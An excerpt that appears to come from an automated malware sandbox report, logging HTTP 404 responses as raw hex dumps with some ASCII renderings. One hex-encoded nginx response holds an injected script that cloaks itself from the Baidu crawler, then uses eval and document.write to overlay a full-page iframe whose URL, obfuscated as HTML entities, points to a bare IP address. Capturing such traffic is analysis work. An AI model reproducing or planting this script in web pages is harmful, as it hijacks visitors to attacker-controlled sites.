4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Nov 2022 18:25:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Nov 2022 18:25:04 GMTContent-Type: text/htmlContent-Length: 1741Connection: closeVary: Accept-EncodingETag: "634bbb43-6cd"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 62 61 69 64 75 22 29 20 3d 3d 20 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 22 e6 be b3 e9 97 a8 e9 93 b6 e6 b2 b3 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 34 35 2e 31 32 32 2e 31 33 38 2e 34 35 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 28 27 27 29 3b 76 61 72 20 73 73 3d 27 3c 64 69 76 20 69 64 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 22 3e 3c 69 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 79 65 73 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 30 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 30 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 77 69 64 74 68 3d 22 31 34 30 30 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 73 72 63 3d 22 26 23 31 30 34 3b 26 23 31 31 36 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 31 3b 26 23 35 36 3b 26 23 34 36 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 37 3b 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 64 69 76 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 74 6d 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 20 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3c 2f 73 74 79 6c 65 3e 27 3b 65 76 61 6c 28 22 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 22 2b 73 73 2b 22 27 29 3b 22 29 3b 74 72 79 7b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 64 69 76 41 6c 6c 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:25:18 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:25:20 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:25:22 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:25:24 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 21 Nov 2022 18:25:36 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 21 Nov 2022 18:25:41 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 